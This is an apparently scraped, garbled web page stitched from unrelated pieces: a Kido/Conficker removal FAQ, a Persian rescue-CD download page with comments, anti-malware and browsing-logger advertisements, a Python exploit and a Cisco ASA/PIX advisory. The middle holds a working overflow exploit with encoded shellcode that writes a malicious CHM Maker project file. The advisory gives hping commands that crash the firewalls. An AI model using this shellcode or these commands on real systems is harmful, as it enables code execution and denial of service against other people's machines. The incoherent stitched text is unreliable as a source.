expolit crack hack virus shellcodes

	Virus Alert 01.13.09 20:12 MSK Net-Worm.Win32.Kido Danger: moderate risk

What is Kido? Kido (aka Conficker or Downadup) was first detected in November 2008 as a worm which spreads across local networks and removable storage media. The latest generation of Kido is unable to spread by itself, but like earlier variants, it can update itself by downloading additional code. Kido has created a powerful botnet of infected machines. It was programmed to update itself on 1st April 2009, and the latest generation of this program is designed to generate 50,000 domain names according to a random algorithm, and then choose 500 of these domains which it can potentially contact to update itself. Kido uses very sophisticated technology. It downloads updates from constantly changing online resources; uses P2P networks as an additional source of downloads; uses strong encryption to prevent interference with its command and control center; and prevents antivirus products from receiving updates. It remains unclear why the Kido botnet has been created, and how it may be used in the future. Why is Kido a threat? The huge botnet formed by computers infected by Kido potentially provides cybercriminals with the means to conduct mass DDoS attacks on any Internet resource, to steal confidential data from infected computers and to distribute unsolicited content (e.g. mass spam mailings). It is believed that around five to six million computers around the world are infected by Kido. Kido initially spread via local networks and removable storage devices. Specifically, it exploited the critical MS08-067 vulnerabilitypatched by Microsoft back in October 2008. However, it’s believed that a significant number of PCs had not been patched by January 2009 when the spread of Kido reached a peak. More detailed information on how Kido penetrates computers can be found here: http://www.viruslist.com/en/viruses/encyclopedia?virusid=21782725 http://www.viruslist.com/en/viruses/encyclopedia?virusid=21782733 http://www.viruslist.com/en/viruses/encyclopedia?virusid=21782749 http://www.viruslist.com/en/viruses/encyclopedia?virusid=21782790 How can I prevent a Kido infection? Kaspersky Lab products can protect systems from infection by all variants of Kido. Ensure you have enabled automatic product update (enabled by default) and conduct a full system scan. Although Kaspersky Internet Security protects unpatched computers from infection, you should still check that you have installed all the latest Windows security updates (especially MS08-067). How do I know if my PC is infected? If there are any infected computers on your LAN, the volume of network traffic will increase due to a network attack conducted by infected computers. Antivirus applications with an enabled firewall will report an Intrusion.Win.NETAPI.buffer-overflow.exploit attack. If you suspect that your computer is infected, try to open your browser and navigate to your favorite search engine. If the page opens, try to open www.kaspersky.com or www.microsoft.com – if the page does not open, then the site has probably been blocked by a malicious program. The full list of resources blocked by Kido can be found here. I am a LAN administrator. How can I contain and disinfect a Kido infection? You can remove Kido with the help of a dedicated utility, KKiller.exe. To prevent workstations and network servers from becoming infected you should: Install patches for the MS08-067, MS08-068 and MS09-001 vulnerabilities. Make sure you have a strong administrator password – it should have a minimum of six characters, including upper case, lower case, numbers and non alphanumeric characters. Disable autorun for all removable media. Disable Task Scheduler. If you are using KKiller.exe to remove Kido, you should run this application manually on all infected PCs. How can I remove Kido if I am a home user? Download KKiller_v3.4.1.zip and unpack it to a separate folder on the infected PC. Run KKiller.exe. When the scan is finished, a command line window may still be open; simply press any key to close it. If you are running KKiller.exe on a computer which has Agnitum Outpost Firewall installed, you should reboot the computer once the KKiller utility has finished running.

Upload a file

Quick heal live scanning 2009 CD

تعداد دريافت :3821

حجم فايل :12.13

MBاین برنامه برای از بین بردن ویروس ها در مکان های خاصی به کار می رود که برنامه ها دیگر امنیتی قادر به کشف آن نیستند.این برنامه باید بر روی cd کپی شود و سپس اجرا شود.این برنامه معروف که به تازگی بازار خوبی برای خود کسب کرده است توسط کمپانی هندی به بازار عرضه شد. امکان دارد به زمانی بر بخورید که سیستم شما از ویروس مملو شده است یا ویروسی در آن زندگی می کند که شما از آن عاصی شدید و می خواهید آواره اش کنید!!!به جمله ی زیر که از زبان یکی از کاربران این cd گفته شده است توجه کنید: من مدتی بود که ویروس هایی در کامپیوتر خود پیدا می کردم و تا حدی آنها را با نرم افزارهای امنیتی مختلفی از بین بردم ولی با این حال هیچ فرقی در سیستم من حاصل نشده بود تا زمانی که من از این برنامه استفاده کردم و سه روز هست که هیچ مشکلی ندارم.شاید ارزش یک بار امتحان را داشته باشد(تیری در تاریکی)نظر شما چیه؟

نظرات کاربران :

Mbldown

واقعا عالی و به درد بخوره چون بعضی ویروسها رو یه آنتی ویروس با آپدید 1ماه پیش میگره ولی آنتی ویروس دیگری با آپدیت 2روز پیش همان ویروس هم نمی تونه بگیره
یه سوال آیا آنتی ویروس GDATA -AVK2009را می شود به شکل آفلاین دانلود کرد یا نه

شنبه 25/8/1387-0:32

hamed2560

واقعا عالی و به درد میخوره منم میخوام امتحان کنم چون همیشه فکر میکردم که سیستم من ویروس نداره ولی وقتی بردم گارانتی و اونجا چند فایل رو با فلش کپی کردیم و با با سیستماونا امتحان کردیم که فهمیدم که ویروسداره سیستم منه بیچاره تا ایکه با اپدیت نود32 و چند برنامه دیگه چندتا تروجان و ویروس پیدا کردم(اونج انتی ویروسشون کاسپر بود) حالا هم که میخوام اینو دانلود کنم ببینم چطوره و ایا این تعریفی که اینجا نوشته چطوره و این کابر ...فعلا در حال دانلودم

شنبه 25/8/1387-9:37

Onlooker

جالب باید باشه برنامه نویس های هندی کم کسانی نیستند اوناهم بعضیشون خون آریایی در رگاشون هست خبر دارید که وقتی آریایی ها مهاجرت کردند و به ایران رسیدند سه گروهشون اینجا موندند و بقیه به طرف هندوستان رفتند و این که چیزی نیست نرم افزار PSX هم که توسط اینا درست شد یک نرم افزار عالی هست برای اجرای بازی های پلی استیشن یک در کل باید اینم دانلود کنم تا ببینم این هندی ها دوباره چی کار کردند؟

شنبه 25/8/1387-11:39

s_r_asadiyan

با سلام 
فقط یک مسئله ای رو با اجازه شما توضیح بدم برای اون دسته از دوستانی که نمی دونن چه طور ازاین انتی ویروس استفاده کنن :
بعداز خارج کردن از حالت فشرده به یک فایل ایمیج به ظرفییت حدود 35 مگ می رسید این فایل رو از طریق نرم افزار نرو 
Nero \copy and backup\Burn image to disc
روی یک cd خام رایت می کنین بعد کامپیوتر رو ریستارت و وقتی به شما اطلاع داد که با زدن یک کلید با این cd ویندوز شما بوت شود شما هم یک کلید را بزنید و بشینید تا آنتی ویروس کارخودش را انجام دهد و در نهایت بعد از یک اسکن کامل اعلام می کند که cd را از دستگاه خارج کنید و بعد هم خودش دستگاه رایانه را ریستارت می کند.
موفق و موید باشید.

 

سوال : سلام علیکم
بهترین قطعات برای یک رایانه خوب چیست قطعات داخل کیس لطفا مارک وقیمت رابگوییدبرای یک یستم باسرعت بالا
باتشکر..

پاسخ: باسلام
دوست عزیز، بهتر بود مبلغی که میخواهید هزینه کنید را بیان میکردید، به شما کیس های زیر را پیشنهاد میکنم:

ادامه مطلب

! subscribe for free your website now ! Url : (www.yoursite.com) Language: EnglishItalianEspaniolFrenchGerman

Click here to download all our software

Users’ major headache today is malware that spoils their lives. It is often easier to catch malware than get rid of it.

Note: We are not talking about viruses, trojans or worms, which can be normally cured by anti-virus software.

Malware includes programs like:

• Adware programs that show banner ads.
• Spyware programs that send your private information like your name, browser history, login names and passwords, credit card numbers, and your phone number and address to someone else’s servers.
• Hijackers – programs that control various modules of your web browser, such as Home page or search page, or redirect to specific websites or their own search engines.
• Toolbars – plugins to browser programs that enhance their functionality. The Google and Yahoo! toolbars are probably the most common legitimate examples. Malware toolbars often attempt to emulate their functionality and look.
• Dialers – programs that set up your modem to dial a toll 1-900 number. Dialers generally from web sites with the adult content and “ask” users to install them to gain access to specific websites. The users then get humongous telephone bills.

Why Fight Malware?

Having a malware program on your computer is first of all a major security breach. Since malware programs are often underdeveloped, they may consume significant resources on your computer, which causes the performance slow down and even the system crash that may occur due to a conflict between malware and other software. If that’s adware, that is continuous commercial that will annoy you.

There are many programs for fighting spyware – anti-spyware programs. Anti-spyware programs inspect the contents of the Windows registry, the operating system files, and installed programs and remove files included in the database of well-known spyware components. However, quite often an antispyware program may define whether a particular file is a spyware component just by the file name or by the key name in the registry, which, in the context of the correct spyware definition, is absolutely illiterate. Some observers describe the Alexa Toolbar, an Internet Explorer plug-in published by Amazon.com, as spyware (and some antispyware programs report it as such) although many users have chosen to install it.

Identifying malware and the basics of prevention is a complicated job.

What Is Browser Sentinel?

Browser Sentinel is malware protection and removal tool. It monitors vulnerable zones of your PC for all kinds of malware, regardless of what software is trying to cause the problems. It will alert you and help to remove adware, trojans, keyloggers and other malware. Browser Sentinel does not use a database of known intruders, and is, thus, extremely fast and efficient.

What Audience Does Browser Sentinel Target?

Browser Sentinel targets experienced users who understand the way Windows functions. The program lets a user edit very "sensitive" (or critical) zones of Windows. On one hand, this allows you to get complete control over these zones, accepting or denying any changes there.

What Browser Sentinel Does And What It Doesn't?

Browser Sentinel displays information about critical zones of Windows, which can be abused by malicious software (malware: adware, spyware, trojans, etc.) with the purpose of watching your activity, displaying popup ads or spamming your computer. Having these zones monitored by Browser Sentinel lets you always be informed of malware activity on your computer. Browser Sentinel also lets you counteract malware by editing these critical zones.

Browser Sentinel does NOT have a malware database like the majority of other antispyware programs. Those databases are often just cloned by antispyware developers and do not have anything fundamentally new. 
Browser Sentinel won't tell you which program is legitimate, and what program is not. It is up to you to decide, which component is malware, and which one is not. Browser Sentinel displays exhaustive information about every item in the zone. Armed with your intuition and a good search engine you should have no problem with finding and removing malware!

Read More about BrowserSentinel (antimalware) here

Download BrowserSentinel

Buy BrowserSentinel

 

Click here to download all other our software

Freeware	Shareware
IE Privacy Keeper Get File Size  Flash and Pics Control Flash Saving Plugin SWF Opener Picture Ace Lite Easy Go Back	BrowserSentinel PicureAce Surf Logger Secret Explorer Advanced Printer Activity Logger Aurora Password Manager

SurfLogger - Internet Surfing History Your internet surfing history in one click! Save detailed web browsing history! Provides a user with exhaustive information about visited website. Save website address, webpage, date, time of connection, GET and POST parameters automatically. With SurfLogger you can view an accurate account for each connection, monitor and analyze online activity on your computer at home and in office.

# it's the same exploit i wrote for chm maker,everything is the same!!# but there's a lil note that when importing 'Devil_Inside.chmprj' a message
# will pops up and tells that the project file format is outdated bla bla but after clicking
# ok it will load into the program,and just go to File>Make Ebook.. and calc
# p.s:you can avoid the message by using chm ebook project data,i'm lazy to do that
# so i've used the chm maker one :D

ns = "\xEB\x06\x90\x90"
sh = "\x05\x67\x35\x45"

shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x71\x32\x42\x42\x42\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x4d"
"\x38\x43\x74\x35\x50\x53\x30\x77\x70\x4e\x6b\x53\x75\x77\x4c\x4c"
"\x4b\x63\x4c\x54\x45\x34\x38\x67\x71\x5a\x4f\x6c\x4b\x62\x6f\x75"
"\x48\x6e\x6b\x41\x4f\x47\x50\x33\x31\x58\x6b\x63\x79\x4e\x6b\x36"
"\x54\x4c\x4b\x45\x51\x68\x6e\x34\x71\x59\x50\x4c\x59\x4c\x6c\x4f"
"\x74\x6f\x30\x72\x54\x47\x77\x58\x41\x39\x5a\x34\x4d\x57\x71\x69"
"\x52\x48\x6b\x69\x64\x67\x4b\x46\x34\x66\x44\x74\x44\x53\x45\x6b"
"\x55\x4c\x4b\x43\x6f\x31\x34\x67\x71\x78\x6b\x63\x56\x4c\x4b\x54"
"\x4c\x62\x6b\x6e\x6b\x31\x4f\x67\x6c\x37\x71\x78\x6b\x4c\x4b\x45"
"\x4c\x4c\x4b\x73\x31\x4a\x4b\x6c\x49\x51\x4c\x74\x64\x67\x74\x6b"
"\x73\x34\x71\x6f\x30\x42\x44\x6c\x4b\x71\x50\x34\x70\x4e\x65\x4f"
"\x30\x62\x58\x46\x6c\x6c\x4b\x41\x50\x44\x4c\x4c\x4b\x42\x50\x65"
"\x4c\x4e\x4d\x6e\x6b\x50\x68\x34\x48\x4a\x4b\x73\x39\x6e\x6b\x4b"
"\x30\x4c\x70\x57\x70\x63\x30\x37\x70\x4e\x6b\x42\x48\x57\x4c\x51"
"\x4f\x56\x51\x48\x76\x31\x70\x73\x66\x6e\x69\x59\x68\x4e\x63\x4f"
"\x30\x73\x4b\x66\x30\x65\x38\x68\x70\x6d\x5a\x34\x44\x51\x4f\x30"
"\x68\x4e\x78\x4b\x4e\x6c\x4a\x54\x4e\x32\x77\x79\x6f\x79\x77\x41"
"\x73\x75\x31\x72\x4c\x41\x73\x57\x70\x61")

header1 = (
'\n'
'Chm Maker project\n'
'\n'
' \n'
' filename\n'
' 0\n'
' '+"\x41"*320+ns+sh+"\x90"*20+shellcode+"\x41" * 5000)

header2 = (
'\n'
' \n'
' 1\n'
'\n'
'\n'
' 0\n'
'\n'
'\n'
' 1\n'
' 1\n'
' 0\n'
' 0\n'
' 1\n'
' 0\n'
' 32\n'
' 0\n'
'\n'
'\n'
' kkkkkkkkkkkkkkk\n'
' \n'
' 0\n'
' 0\n'
' 0\n'
' 0\n'
' 1\n'
' 1\n'
' 1\n'
' 0\n'
' 0\n'
' 1\n'
' 1\n'
' 0\n'
' 0\n'
' 0\n'
' \n'
' 0\n'
' \n'
' \n'
' 0\n'
' \n'
' \n'
' 1\n'
' \n'
'\n'
'\n'
)


file=open('Devil_Inside.chmprj','w')
file.write(header1+header2)
file.close()

SurfLogger - Internet Surfing History Your internet surfing history in one click! Save detailed web browsing history! Provides a user with exhaustive information about visited website. Save website address, webpage, date, time of connection, GET and POST parameters automatically. With SurfLogger you can view an accurate account for each connection, monitor and analyze online activity on your computer at home and in office.

The vulnerability affects the following Cisco ASA/PIX versions:
Release Fixed in:
-------- ---------
6.3 Not affected
7.0 7.0(8.6)  
7.1 7.1(2.81)  
7.2 7.2(4.30)  
8.0 8.0(4.28)  
8.1 8.1(2.19)  
8.2 8.2(0.230)

-----------------------------
Triggering the vuln
------------------------------

/*Utilize 1550 blocks on an ASA to trigger a crash...*/
hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2

/* Trigger the vuln a bit faster */
hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2

Reloading the device is the only way to recover from the denial of service.

| Daniel Uriah Clemens
"Moments of sorrow are moments of sobriety"